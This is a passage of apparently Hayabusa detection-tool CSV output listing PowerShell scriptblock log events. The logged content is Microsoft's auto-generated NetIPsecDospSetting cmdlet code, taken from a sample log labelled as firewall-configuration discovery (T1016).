= $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DefBlockExemptRateLimitBytesPerSec'; ParameterType = 
'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxStateEntries')) { [object]$__cmdletization_value = ${MaxStateEntries} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxStateEntries'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxStateEntries'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxPerIPRateLimitQueues')) { [object]$__cmdletization_value = ${MaxPerIPRateLimitQueues} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxPerIPRateLimitQueues'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxPerIPRateLimitQueues'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) 
[object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnabledKeyingModules')) { [object]$__cmdletization_value = ${EnabledKeyingModules} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EnabledKeyingModules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EnabledKeyingModules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('FilteringFlags')) { [object]$__cmdletization_value = ${FilteringFlags} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'FilteringFlags'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'FilteringFlags'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 
$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PublicInterfaceAliases')) { [object]$__cmdletization_value = ${PublicInterfaceAliases} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PublicInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PublicInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PrivateInterfaceAliases')) { [object]$__cmdletization_value = ${PrivateInterfaceAliases} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PrivateInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PrivateInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 
$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PublicV6Address')) { [object]$__cmdletization_value = ${PublicV6Address} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PublicV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PublicV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PrivateV6Address')) { [object]$__cmdletization_value = ${PrivateV6Address} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PrivateV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PrivateV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo 
@('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecDospSetting.cmdletDefinition.cdxml-Help.xml }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.098 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Get-NetIPsecDospSetting { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIPsecDoSPSetting')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if 
($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('ElementName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecDospSetting.cmdletDefinition.cdxml-Help.xml }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.098 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Set-NetIPsecDospSetting { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] 
[OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIPsecDoSPSetting')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIPsecDoSPSetting')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${StateIdleTimeoutSeconds}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${PerIPRateLimitQueueIdleTimeoutSeconds}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6IPsecUnauthDscp}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6IPsecUnauthRateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6IPsecUnauthPerIPRateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint16] ${IpV6IPsecAuthDscp}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6IPsecAuthRateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint16] ${IcmpV6Dscp}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IcmpV6RateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6FilterExemptDscp}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6FilterExemptRateLimitBytesPerSec}, 
[Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint16] ${DefBlockExemptDscp}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${DefBlockExemptRateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${MaxStateEntries}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${MaxPerIPRateLimitQueues}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules] ${EnabledKeyingModules}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags] ${FilteringFlags}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [System.Management.Automation.WildcardPattern[]] ${PublicInterfaceAliases}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [System.Management.Automation.WildcardPattern[]] ${PrivateInterfaceAliases}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${PublicV6Address}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${PrivateV6Address}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] 
${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('ElementName', $__cmdletization_values, $true, 'Default') } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('StateIdleTimeoutSeconds')) { [object]$__cmdletization_value = ${StateIdleTimeoutSeconds} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'StateIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; 
Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'StateIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PerIPRateLimitQueueIdleTimeoutSeconds')) { [object]$__cmdletization_value = ${PerIPRateLimitQueueIdleTimeoutSeconds} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PerIPRateLimitQueueIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PerIPRateLimitQueueIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthDscp')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthDscp} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecUnauthDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object 
Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecUnauthDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthRateLimitBytesPerSec} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecUnauthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecUnauthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthPerIPRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthPerIPRateLimitBytesPerSec} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecUnauthPerIPRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 
'IpV6IPsecUnauthPerIPRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecAuthDscp')) { [object]$__cmdletization_value = ${IpV6IPsecAuthDscp} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecAuthDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecAuthDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecAuthRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecAuthRateLimitBytesPerSec} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecAuthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecAuthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = 
$__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpV6Dscp')) { [object]$__cmdletization_value = ${IcmpV6Dscp} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IcmpV6Dscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IcmpV6Dscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpV6RateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IcmpV6RateLimitBytesPerSec} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IcmpV6RateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IcmpV6RateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if 
($PSBoundParameters.ContainsKey('IpV6FilterExemptDscp')) { [object]$__cmdletization_value = ${IpV6FilterExemptDscp} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6FilterExemptDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6FilterExemptDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundP",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.098 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"arameters.ContainsKey('IpV6FilterExemptRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6FilterExemptRateLimitBytesPerSec} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6FilterExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6FilterExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = 
$__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefBlockExemptDscp')) { [object]$__cmdletization_value = ${DefBlockExemptDscp} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DefBlockExemptDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DefBlockExemptDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefBlockExemptRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${DefBlockExemptRateLimitBytesPerSec} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DefBlockExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DefBlockExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null 
